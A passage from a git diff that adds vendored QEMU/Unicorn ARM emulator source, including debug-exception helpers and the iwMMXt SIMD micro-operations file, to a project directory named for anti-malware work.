| fsc; +} + +static inline uint32_t syn_swstep(int same_el, int isv, int ex) +{ + return (((unsigned int)EC_SOFTWARESTEP) << ARM_EL_EC_SHIFT) | (same_el << ARM_EL_EC_SHIFT) + | (isv << 24) | (ex << 6) | 0x22; +} + +static inline uint32_t syn_watchpoint(int same_el, int cm, int wnr) +{ + return (((unsigned int)EC_WATCHPOINT) << ARM_EL_EC_SHIFT) | (same_el << ARM_EL_EC_SHIFT) + | (cm << 8) | (wnr << 6) | 0x22; +} + +static inline uint32_t syn_breakpoint(int same_el) +{ + return (((unsigned int) EC_BREAKPOINT) << ARM_EL_EC_SHIFT) | (same_el << ARM_EL_EC_SHIFT) + | ARM_EL_IL | 0x22; +} + +/* Update a QEMU watchpoint based on the information the guest has set in the + * DBGWCR_EL1 and DBGWVR_EL1 registers. + */ +void hw_watchpoint_update(ARMCPU *cpu, int n); +/* Update the QEMU watchpoints for every guest watchpoint. This does a + * complete delete-and-reinstate of the QEMU watchpoint list and so is + * suitable for use after migration or on reset. + */ +void hw_watchpoint_update_all(ARMCPU *cpu); +/* Update a QEMU breakpoint based on the information the guest has set in the + * DBGBCR_EL1 and DBGBVR_EL1 registers. + */ +void hw_breakpoint_update(ARMCPU *cpu, int n); +/* Update the QEMU breakpoints for every guest breakpoint. This does a + * complete delete-and-reinstate of the QEMU breakpoint list and so is + * suitable for use after migration or on reset. + */ +void hw_breakpoint_update_all(ARMCPU *cpu); + +/* Callback function for when a watchpoint or breakpoint triggers. */ +void arm_debug_excp_handler(CPUState *cs); + +#ifdef CONFIG_USER_ONLY +static inline bool arm_is_psci_call(ARMCPU *cpu, int excp_type) +{ + return false; +} +#else +/* Return true if the r0/x0 value indicates that this SMC/HVC is a PSCI call. */ +bool arm_is_psci_call(ARMCPU *cpu, int excp_type); +/* Actually handle a PSCI call */ +void arm_handle_psci_call(ARMCPU *cpu); +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/iwmmxt_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/iwmmxt_helper.c new file mode 100644 index 0000000..a506914 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/iwmmxt_helper.c @@ -0,0 +1,672 @@ +/* + * iwMMXt micro operations for XScale. + * + * Copyright (c) 2007 OpenedHand, Ltd. + * Written by Andrzej Zaborowski + * Copyright (c) 2008 CodeSourcery + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include +#include + +#include "cpu.h" +#include "exec/exec-all.h" +#include "exec/helper-proto.h" + +/* iwMMXt macros extracted from GNU gdb. */ + +/* Set the SIMD wCASF flags for 8, 16, 32 or 64-bit operations. */ +#define SIMD8_SET( v, n, b) ((v != 0) << ((((b) + 1) * 4) + (n))) +#define SIMD16_SET(v, n, h) ((v != 0) << ((((h) + 1) * 8) + (n))) +#define SIMD32_SET(v, n, w) ((v != 0) << ((((w) + 1) * 16) + (n))) +#define SIMD64_SET(v, n) ((v != 0) << (32 + (n))) +/* Flags to pass as "n" above. */ +#define SIMD_NBIT -1 +#define SIMD_ZBIT -2 +#define SIMD_CBIT -3 +#define SIMD_VBIT -4 +/* Various status bit macros. */ +#define NBIT8(x) ((x) & 0x80) +#define NBIT16(x) ((x) & 0x8000) +#define NBIT32(x) ((x) & 0x80000000) +#define NBIT64(x) ((x) & 0x8000000000000000ULL) +#define ZBIT8(x) (((x) & 0xff) == 0) +#define ZBIT16(x) (((x) & 0xffff) == 0) +#define ZBIT32(x) (((x) & 0xffffffff) == 0) +#define ZBIT64(x) (x == 0) +/* Sign extension macros. */ +#define EXTEND8H(a) ((uint16_t) (int8_t) (a)) +#define EXTEND8(a) ((uint32_t) (int8_t) (a)) +#define EXTEND16(a) ((uint32_t) (int16_t) (a)) +#define EXTEND16S(a) ((int32_t) (int16_t) (a)) +#define EXTEND32(a) ((uint64_t) (int32_t) (a)) + +uint64_t HELPER(iwmmxt_maddsq)(uint64_t a, uint64_t b) +{ + a = (( + EXTEND16S((a >> 0) & 0xffff) * EXTEND16S((b >> 0) & 0xffff) + + EXTEND16S((a >> 16) & 0xffff) * EXTEND16S((b >> 16) & 0xffff) + ) & 0xffffffff) | ((uint64_t) ( + EXTEND16S((a >> 32) & 0xffff) * EXTEND16S((b >> 32) & 0xffff) + + EXTEND16S((a >> 48) & 0xffff) * EXTEND16S((b >> 48) & 0xffff) + ) << 32); + return a; +} + +uint64_t HELPER(iwmmxt_madduq)(uint64_t a, uint64_t b) +{ + a = (( + ((a >> 0) & 0xffff) * ((b >> 0) & 0xffff) + + ((a >> 16) & 0xffff) * ((b >> 16) & 0xffff) + ) & 0xffffffff) | (( + ((a >> 32) & 0xffff) * ((b >> 32) & 0xffff) + + ((a >> 48) & 0xffff) * ((b >> 48) & 0xffff) + ) << 32); + return a; +} + +uint64_t HELPER(iwmmxt_sadb)(uint64_t a, uint64_t b) +{ +#define abs(x) (((x) >= 0) ? x : -x) +#define SADB(SHR) abs((int) ((a >> SHR) & 0xff) - (int) ((b >> SHR) & 0xff)) + return + SADB(0) + SADB(8) + SADB(16) + SADB(24) + + SADB(32) + SADB(40) + SADB(48) + SADB(56); +#undef SADB +} + +uint64_t HELPER(iwmmxt_sadw)(uint64_t a, uint64_t b) +{ +#define SADW(SHR) \ + abs((int) ((a >> SHR) & 0xffff) - (int) ((b >> SHR) & 0xffff)) + return SADW(0) + SADW(16) + SADW(32) + SADW(48); +#undef SADW +} + +uint64_t HELPER(iwmmxt_mulslw)(uint64_t a, uint64_t b) +{ +#define MULS(SHR) ((uint64_t) ((( \ + EXTEND16S((a >> SHR) & 0xffff) * EXTEND16S((b >> SHR) & 0xffff) \ + ) >> 0) & 0xffff) << SHR) + return MULS(0) | MULS(16) | MULS(32) | MULS(48); +#undef MULS +} + +uint64_t HELPER(iwmmxt_mulshw)(uint64_t a, uint64_t b) +{ +#define MULS(SHR) ((uint64_t) ((( \ + EXTEND16S((a >> SHR) & 0xffff) * EXTEND16S((b >> SHR) & 0xffff) \ + ) >> 16) & 0xffff) << SHR) + return MULS(0) | MULS(16) | MULS(32) | MULS(48); +#undef MULS +} + +uint64_t HELPER(iwmmxt_mululw)(uint64_t a, uint64_t b) +{ +#define MULU(SHR) ((uint64_t) ((( \ + ((a >> SHR) & 0xffff) * ((b >> SHR) & 0xffff) \ + ) >> 0) & 0xffff) << SHR) + return MULU(0) | MULU(16) | MULU(32) | MULU(48); +#undef MULU +} + +uint64_t HELPER(iwmmxt_muluhw)(uint64_t a, uint64_t b) +{ +#define MULU(SHR) ((uint64_t) ((( \ + ((a >> SHR) & 0xffff) * ((b >> SHR) & 0xffff) \ + ) >> 16) & 0xffff) << SHR) + return MULU(0) | MULU(16) | MULU(32) | MULU(48); +#undef MULU +} + +uint64_t HELPER(iwmmxt_macsw)(uint64_t a, uint64_t b) +{ +#define MACS(SHR) ( \ + EXTEND16((a >> SHR) & 0xffff) * EXTEND16S((b >> SHR) & 0xffff)) + return (int64_t) (MACS(0) + MACS(16) + MACS(32) + MACS(48)); +#undef MACS +} + +uint64_t HELPER(iwmmxt_macuw)(uint64_t a, uint64_t b) +{ +#define MACU(SHR) ( \ + (uint32_t) ((a >> SHR) & 0xffff) * \ + (uint32_t) ((b >> SHR) & 0xffff)) + return MACU(0) + MACU(16) + MACU(32) + MACU(48); +#undef MACU +} + +#define NZBIT8(x, i) \ + SIMD8_SET(NBIT8((x) & 0xff), SIMD_NBIT, i) | \ + SIMD8_SET(ZBIT8((x) & 0xff), SIMD_ZBIT, i) +#define NZBIT16(x, i) \ + SIMD16_SET(NBIT16((x) & 0xffff), SIMD_NBIT, i) | \ + SIMD16_SET(ZBIT16((x) & 0xffff), SIMD_ZBIT, i) +#define NZBIT32(x, i) \ + SIMD32_SET(NBIT32((x) & 0xffffffff), SIMD_NBIT, i) | \ + SIMD32_SET(ZBIT32((x) & 0xffffffff), SIMD_ZBIT, i) +#define NZBIT64(x) \ + SIMD64_SET(NBIT64(x), SIMD_NBIT) | \ + SIMD64_SET(ZBIT64(x), SIMD_ZBIT) +#define IWMMXT_OP_UNPACK(S, SH0, SH1, SH2, SH3) \ +uint64_t HELPER(glue(iwmmxt_unpack, glue(S, b)))(CPUARMState *env, \ + uint64_t a, uint64_t b) \ +{ \ + a = \ + (((a >> SH0) & 0xff) << 0) | (((b >> SH0) & 0xff) << 8) | \ + (((a >> SH1) & 0xff) << 16) | (((b >> SH1) & 0xff) << 24) | \ + (((a >> SH2) & 0xff) << 32) | (((b >> SH2) & 0xff) << 40) | \ + (((a >> SH3) & 0xff) << 48) | (((b >> SH3) & 0xff) << 56); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + NZBIT8(a >> 0, 0) | NZBIT8(a >> 8, 1) | \ + NZBIT8(a >> 16, 2) | NZBIT8(a >> 24, 3) | \ + NZBIT8(a >> 32, 4) | NZBIT8(a >> 40, 5) | \ + NZBIT8(a >> 48, 6) | NZBIT8(a >> 56, 7); \ + return a; \ +} \ +uint64_t HELPER(glue(iwmmxt_unpack, glue(S, w)))(CPUARMState *env, \ + uint64_t a, uint64_t b) \ +{ \ + a = \ + (((a >> SH0) & 0xffff) << 0) | \ + (((b >> SH0) & 0xffff) << 16) | \ + (((a >> SH2) & 0xffff) << 32) | \ + (((b >> SH2) & 0xffff) << 48); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + NZBIT8(a >> 0, 0) | NZBIT8(a >> 16, 1) | \ + NZBIT8(a >> 32, 2) | NZBIT8(a >> 48, 3); \ + return a; \ +} \ +uint64_t HELPER(glue(iwmmxt_unpack, glue(S, l)))(CPUARMState *env, \ + uint64_t a, uint64_t b) \ +{ \ + a = \ + (((a >> SH0) & 0xffffffff) << 0) | \ + (((b >> SH0) & 0xffffffff) << 32); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + NZBIT32(a >> 0, 0) | NZBIT32(a >> 32, 1); \ + return a; \ +} \ +uint64_t HELPER(glue(iwmmxt_unpack, glue(S, ub)))(CPUARMState *env, \ + uint64_t x) \ +{ \ + x = \ + (((x >> SH0) & 0xff) << 0) | \ + (((x >> SH1) & 0xff) << 16) | \ + (((x >> SH2) & 0xff) << 32) | \ + (((x >> SH3) & 0xff) << 48); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | \ + NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); \ + return x; \ +} \ +uint64_t HELPER(glue(iwmmxt_unpack, glue(S, uw)))(CPUARMState *env, \ + uint64_t x) \ +{ \ + x = \ + (((x >> SH0) & 0xffff) << 0) | \ + (((x >> SH2) & 0xffff) << 32); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); \ + return x; \ +} \ +uint64_t HELPER(glue(iwmmxt_unpack, glue(S, ul)))(CPUARMState *env, \ + uint64_t x) \ +{ \ + x = (((x >> SH0) & 0xffffffff) << 0); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x >> 0); \ + return x; \ +} \ +uint64_t HELPER(glue(iwmmxt_unpack, glue(S, sb)))(CPUARMState *env, \ + uint64_t x) \ +{ \ + x = \ + ((uint64_t) EXTEND8H((x >> SH0) & 0xff) << 0) | \ + ((uint64_t) EXTEND8H((x >> SH1) & 0xff) << 16) | \ + ((uint64_t) EXTEND8H((x >> SH2) & 0xff) << 32) | \ + ((uint64_t) EXTEND8H((x >> SH3) & 0xff) << 48); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | \ + NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); \ + return x; \ +} \ +uint64_t HELPER(glue(iwmmxt_unpack, glue(S, sw)))(CPUARMState *env, \ + uint64_t x) \ +{ \ + x = \ + ((uint64_t) EXTEND16((x >> SH0) & 0xffff) << 0) | \ + ((uint64_t) EXTEND16((x >> SH2) & 0xffff) << 32); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); \ + return x; \ +} \ +uint64_t HELPER(glue(iwmmxt_unpack, glue(S, sl)))(CPUARMState *env, \ + uint64_t x) \ +{ \ + x = EXTEND32((x >> SH0) & 0xffffffff); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x >> 0); \ + return x; \ +} +IWMMXT_OP_UNPACK(l, 0, 8, 16, 24) +IWMMXT_OP_UNPACK(h, 32, 40, 48, 56) + +#define IWMMXT_OP_CMP(SUFF, Tb, Tw, Tl, O) \ +uint64_t HELPER(glue(iwmmxt_, glue(SUFF, b)))(CPUARMState *env, \ + uint64_t a, uint64_t b) \ +{ \ + a = \ + CMP(0, Tb, O, 0xff) | CMP(8, Tb, O, 0xff) | \ + CMP(16, Tb, O, 0xff) | CMP(24, Tb, O, 0xff) | \ + CMP(32, Tb, O, 0xff) | CMP(40, Tb, O, 0xff) | \ + CMP(48, Tb, O, 0xff) | CMP(56, Tb, O, 0xff); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + NZBIT8(a >> 0, 0) | NZBIT8(a >> 8, 1) | \ + NZBIT8(a >> 16, 2) | NZBIT8(a >> 24, 3) | \ + NZBIT8(a >> 32, 4) | NZBIT8(a >> 40, 5) | \ + NZBIT8(a >> 48, 6) | NZBIT8(a >> 56, 7); \ + return a; \ +} \ +uint64_t HELPER(glue(iwmmxt_, glue(SUFF, w)))(CPUARMState *env, \ + uint64_t a, uint64_t b) \ +{ \ + a = CMP(0, Tw, O, 0xffff) | CMP(16, Tw, O, 0xffff) | \ + CMP(32, Tw, O, 0xffff) | CMP(48, Tw, O, 0xffff); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + NZBIT16(a >> 0, 0) | NZBIT16(a >> 16, 1) | \ + NZBIT16(a >> 32, 2) | NZBIT16(a >> 48, 3); \ + return a; \ +} \ +uint64_t HELPER(glue(iwmmxt_, glue(SUFF, l)))(CPUARMState *env, \ + uint64_t a, uint64_t b) \ +{ \ + a = CMP(0, Tl, O, 0xffffffff) | \ + CMP(32, Tl, O, 0xffffffff); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + NZBIT32(a >> 0, 0) | NZBIT32(a >> 32, 1); \ + return a; \ +} +#define CMP(SHR, TYPE, OPER, MASK) ((((TYPE) ((a >> SHR) & MASK) OPER \ + (TYPE) ((b >> SHR) & MASK)) ? (uint64_t) MASK : 0) << SHR) +IWMMXT_OP_CMP(cmpeq, uint8_t, uint16_t, uint32_t, ==) +IWMMXT_OP_CMP(cmpgts, int8_t, int16_t, int32_t, >) +IWMMXT_OP_CMP(cmpgtu, uint8_t, uint16_t, uint32_t, >) +#undef CMP +#define CMP(SHR, TYPE, OPER, MASK) ((((TYPE) ((a >> SHR) & MASK) OPER \ + (TYPE) ((b >> SHR) & MASK)) ? a : b) & ((uint64_t) MASK << SHR)) +IWMMXT_OP_CMP(mins, int8_t, int16_t, int32_t, <) +IWMMXT_OP_CMP(minu, uint8_t, uint16_t, uint32_t, <) +IWMMXT_OP_CMP(maxs, int8_t, int16_t, int32_t, >) +IWMMXT_OP_CMP(maxu, uint8_t, uint16_t, uint32_t, >) +#undef CMP +#define CMP(SHR, TYPE, OPER, MASK) ((uint64_t) (((TYPE) ((a >> SHR) & MASK) \ + OPER (TYPE) ((b >> SHR) & MASK)) & MASK) << SHR) +IWMMXT_OP_CMP(subn, uint8_t, uint16_t, uint32_t, -) +IWMMXT_OP_CMP(addn, uint8_t, uint16_t, uint32_t, +) +#undef CMP +/* TODO Signed- and Unsigned-Saturation */ +#define CMP(SHR, TYPE, OPER, MASK) ((uint64_t) (((TYPE) ((a >> SHR) & MASK) \ + OPER (TYPE) ((b >> SHR) & MASK)) & MASK) << SHR) +IWMMXT_OP_CMP(subu, uint8_t, uint16_t, uint32_t, -) +IWMMXT_OP_CMP(addu, uint8_t, uint16_t, uint32_t, +) +IWMMXT_OP_CMP(subs, int8_t, int16_t, int32_t, -) +IWMMXT_OP_CMP(adds, int8_t, int16_t, int32_t, +) +#undef CMP +#undef IWMMXT_OP_CMP + +#define AVGB(SHR) ((( \ + ((a >> SHR) & 0xff) + ((b >> SHR) & 0xff) + round) >> 1) << SHR) +#define IWMMXT_OP_AVGB(r) \ +uint64_t HELPER(iwmmxt_avgb##r)(CPUARMState *env, uint64_t a, uint64_t b) \ +{ \ + const int round = r; \ + a = AVGB(0) | AVGB(8) | AVGB(16) | AVGB(24) | \ + AVGB(32) | AVGB(40) | AVGB(48) | AVGB(56); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + SIMD8_SET(ZBIT8((a >> 0) & 0xff), SIMD_ZBIT, 0) | \ + SIMD8_SET(ZBIT8((a >> 8) & 0xff), SIMD_ZBIT, 1) | \ + SIMD8_SET(ZBIT8((a >> 16) & 0xff), SIMD_ZBIT, 2) | \ + SIMD8_SET(ZBIT8((a >> 24) & 0xff), SIMD_ZBIT, 3) | \ + SIMD8_SET(ZBIT8((a >> 32) & 0xff), SIMD_ZBIT, 4) | \ + SIMD8_SET(ZBIT8((a >> 40) & 0xff), SIMD_ZBIT, 5) | \ + SIMD8_SET(ZBIT8((a >> 48) & 0xff), SIMD_ZBIT, 6) | \ + SIMD8_SET(ZBIT8((a >> 56) & 0xff), SIMD_ZBIT, 7); \ + return a; \ +} +IWMMXT_OP_AVGB(0) +IWMMXT_OP_AVGB(1) +#undef IWMMXT_OP_AVGB +#undef AVGB + +#define AVGW(SHR) ((( \ + ((a >> SHR) & 0xffff) + ((b >> SHR) & 0xffff) + round) >> 1) << SHR) +#define IWMMXT_OP_AVGW(r) \ +uint64_t HELPER(iwmmxt_avgw##r)(CPUARMState *env, uint64_t a, uint64_t b) \ +{ \ + const int round = r; \ + a = AVGW(0) | AVGW(16) | AVGW(32) | AVGW(48); \ + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ + SIMD16_SET(ZBIT16((a >> 0) & 0xffff), SIMD_ZBIT, 0) | \ + SIMD16_SET(ZBIT16((a >> 16) & 0xffff), SIMD_ZBIT, 1) | \ + SIMD16_SET(ZBIT16((a >> 32) & 0xffff), SIMD_ZBIT, 2) | \ + SIMD16_SET(ZBIT16((a >> 48) & 0xffff), SIMD_ZBIT, 3); \ + return a; \ +} +IWMMXT_OP_AVGW(0) +IWMMXT_OP_AVGW(1) +#undef IWMMXT_OP_AVGW +#undef AVGW + +uint64_t HELPER(iwmmxt_align)(uint64_t a, uint64_t b, uint32_t n) +{ + a >>= n << 3; + a |= b << (64 - (n << 3)); + return a; +} + +uint64_t HELPER(iwmmxt_insr)(uint64_t x, uint32_t a, uint32_t b, uint32_t n) +{ + x &= ~((uint64_t) b << n); + x |= (uint64_t) (a & b) << n; + return x; +} + +uint32_t HELPER(iwmmxt_setpsr_nz)(uint64_t x) +{ + return SIMD64_SET((x == 0), SIMD_ZBIT) | + SIMD64_SET((x & (1ULL << 63)), SIMD_NBIT); +} + +uint64_t HELPER(iwmmxt_bcstb)(uint32_t arg) +{ + arg &= 0xff; + return + ((uint64_t) arg << 0 ) | ((uint64_t) arg << 8 ) | + ((uint64_t) arg << 16) | ((uint64_t) arg << 24) | + ((uint64_t) arg << 32) | ((uint64_t) arg << 40) | + ((uint64_t) arg << 48) | ((uint64_t) arg << 56); +} + +uint64_t HELPER(iwmmxt_bcstw)(uint32_t arg) +{ + arg &= 0xffff; + return + ((uint64_t) arg << 0 ) | ((uint64_t) arg << 16) | + ((uint64_t) arg << 32) | ((uint64_t) arg << 48); +} + +uint64_t HELPER(iwmmxt_bcstl)(uint32_t arg) +{ + return arg | ((uint64_t) arg << 32); +} + +uint64_t HELPER(iwmmxt_addcb)(uint64_t x) +{ + return + ((x >> 0) & 0xff) + ((x >> 8) & 0xff) + + ((x >> 16) & 0xff) + ((x >> 24) & 0xff) + + ((x >> 32) & 0xff) + ((x >> 40) & 0xff) + + ((x >> 48) & 0xff) + ((x >> 56) & 0xff); +} + +uint64_t HELPER(iwmmxt_addcw)(uint64_t x) +{ + return + ((x >> 0) & 0xffff) + ((x >> 16) & 0xffff) + + ((x >> 32) & 0xffff) + ((x >> 48) & 0xffff); +} + +uint64_t HELPER(iwmmxt_addcl)(uint64_t x) +{ + return (x & 0xffffffff) + (x >> 32); +} + +uint32_t HELPER(iwmmxt_msbb)(uint64_t x) +{ + return + ((x >> 7) & 0x01) | ((x >> 14) & 0x02) | + ((x >> 21) & 0x04) | ((x >> 28) & 0x08) | + ((x >> 35) & 0x10) | ((x >> 42) & 0x20) | + ((x >> 49) & 0x40) | ((x >> 56) & 0x80); +} + +uint32_t HELPER(iwmmxt_msbw)(uint64_t x) +{ + return + ((x >> 15) & 0x01) | ((x >> 30) & 0x02) | + ((x >> 45) & 0x04) | ((x >> 52) & 0x08); +} + +uint32_t HELPER(iwmmxt_msbl)(uint64_t x) +{ + return ((x >> 31) & 0x01) | ((x >> 62) & 0x02); +} + +/* FIXME: Split wCASF setting into a separate op to avoid env use. */ +uint64_t HELPER(iwmmxt_srlw)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x = (((x & (0xffffll << 0)) >> n) & (0xffffll << 0)) | + (((x & (0xffffll << 16)) >> n) & (0xffffll << 16)) | + (((x & (0xffffll << 32)) >> n) & (0xffffll << 32)) | + (((x & (0xffffll << 48)) >> n) & (0xffffll << 48)); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | + NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); + return x; +} + +uint64_t HELPER(iwmmxt_srll)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x = ((x & (0xffffffffll << 0)) >> n) | + ((x >> n) & (0xffffffffll << 32)); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); + return x; +} + +uint64_t HELPER(iwmmxt_srlq)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x >>= n; + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x); + return x; +} + +uint64_t HELPER(iwmmxt_sllw)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x = (((x & (0xffffll << 0)) << n) & (0xffffll << 0)) | + (((x & (0xffffll << 16)) << n) & (0xffffll << 16)) | + (((x & (0xffffll << 32)) << n) & (0xffffll << 32)) | + (((x & (0xffffll << 48)) << n) & (0xffffll << 48)); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | + NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); + return x; +} + +uint64_t HELPER(iwmmxt_slll)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x = ((x << n) & (0xffffffffll << 0)) | + ((x & (0xffffffffll << 32)) << n); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); + return x; +} + +uint64_t HELPER(iwmmxt_sllq)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x <<= n; + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x); + return x; +} + +uint64_t HELPER(iwmmxt_sraw)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x = ((uint64_t) ((EXTEND16(x >> 0) >> n) & 0xffff) << 0) | + ((uint64_t) ((EXTEND16(x >> 16) >> n) & 0xffff) << 16) | + ((uint64_t) ((EXTEND16(x >> 32) >> n) & 0xffff) << 32) | + ((uint64_t) ((EXTEND16(x >> 48) >> n) & 0xffff) << 48); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | + NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); + return x; +} + +uint64_t HELPER(iwmmxt_sral)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x = (((EXTEND32(x >> 0) >> n) & 0xffffffff) << 0) | + (((EXTEND32(x >> 32) >> n) & 0xffffffff) << 32); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); + return x; +} + +uint64_t HELPER(iwmmxt_sraq)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x = (int64_t) x >> n; + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x); + return x; +} + +uint64_t HELPER(iwmmxt_rorw)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x = ((((x & (0xffffll << 0)) >> n) | + ((x & (0xffffll << 0)) << (16 - n))) & (0xffffll << 0)) | + ((((x & (0xffffll << 16)) >> n) | + ((x & (0xffffll << 16)) << (16 - n))) & (0xffffll << 16)) | + ((((x & (0xffffll << 32)) >> n) | + ((x & (0xffffll << 32)) << (16 - n))) & (0xffffll << 32)) | + ((((x & (0xffffll << 48)) >> n) | + ((x & (0xffffll << 48)) << (16 - n))) & (0xffffll << 48)); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | + NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); + return x; +} + +uint64_t HELPER(iwmmxt_rorl)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x = ((x & (0xffffffffll << 0)) >> n) | + ((x >> n) & (0xffffffffll << 32)) | + ((x << (32 - n)) & (0xffffffffll << 0)) | + ((x & (0xffffffffll << 32)) << (32 - n)); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); + return x; +} + +uint64_t HELPER(iwmmxt_rorq)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x = ror64(x, n); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x); + return x; +} + +uint64_t HELPER(iwmmxt_shufh)(CPUARMState *env, uint64_t x, uint32_t n) +{ + x = (((x >> ((n << 4) & 0x30)) & 0xffff) << 0) | + (((x >> ((n << 2) & 0x30)) & 0xffff) << 16) | + (((x >> ((n << 0) & 0x30)) & 0xffff) << 32) | + (((x >> ((n >> 2) & 0x30)) & 0xffff) << 48); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | + NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); + return x; +} + +/* TODO: Unsigned-Saturation */ +uint64_t HELPER(iwmmxt_packuw)(CPUARMState *env, uint64_t a, uint64_t b) +{ + a = (((a >> 0) & 0xff) << 0) | (((a >> 16) & 0xff) << 8) | + (((a >> 32) & 0xff) << 16) | (((a >> 48) & 0xff) << 24) | + (((b >> 0) & 0xff) << 32) | (((b >> 16) & 0xff) << 40) | + (((b >> 32) & 0xff) << 48) | (((b >> 48) & 0xff) << 56); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT8(a >> 0, 0) | NZBIT8(a >> 8, 1) | + NZBIT8(a >> 16, 2) | NZBIT8(a >> 24, 3) | + NZBIT8(a >> 32, 4) | NZBIT8(a >> 40, 5) | + NZBIT8(a >> 48, 6) | NZBIT8(a >> 56, 7); + return a; +} + +uint64_t HELPER(iwmmxt_packul)(CPUARMState *env, uint64_t a, uint64_t b) +{ + a = (((a >> 0) & 0xffff) << 0) | (((a >> 32) & 0xffff) << 16) | + (((b >> 0) & 0xffff) << 32) | (((b >> 32) & 0xffff) << 48); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT16(a >> 0, 0) | NZBIT16(a >> 16, 1) | + NZBIT16(a >> 32, 2) | NZBIT16(a >> 48, 3); + return a; +} + +uint64_t HELPER(iwmmxt_packuq)(CPUARMState *env, uint64_t a, uint64_t b) +{ + a = (a & 0xffffffff) | ((b & 0xffffffff) << 32); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT32(a >> 0, 0) | NZBIT32(a >> 32, 1); + return a; +} + +/* TODO: Signed-Saturation */ +uint64_t HELPER(iwmmxt_packsw)(CPUARMState *env, uint64_t a, uint64_t b) +{ + a = (((a >> 0) & 0xff) << 0) | (((a >> 16) & 0xff) << 8) | + (((a >> 32) & 0xff) << 16) | (((a >> 48) & 0xff) << 24) | + (((b >> 0) & 0xff) << 32) | (((b >> 16) & 0xff) << 40) | + (((b >> 32) & 0xff) << 48) | (((b >> 48) & 0xff) << 56); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + NZBIT8(a >> 0, 0) | NZBIT8(a >> 8, 1) | + NZBIT8(a >> 16, 2) | NZBIT8(a >> 24, 3) | + NZBIT8(a >> 32, 4) | NZBIT8(a >> 40, 5) | + NZBIT8(a >> 48, 6) | NZBIT8(a >> 56, 7); + return a; +} + +uint64_t HELPER(iwmmxt_packsl)(CPUARMState *env, uint64_t a, uint64_t b) +{ + a = (((a >> 0) & 0xffff) << 0) | (((a >> 32) & 0xffff) << 16) | + (((b >> 0) & 0xffff) << 32) | (((b >> 32) & 0xffff) << 48); + env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = + 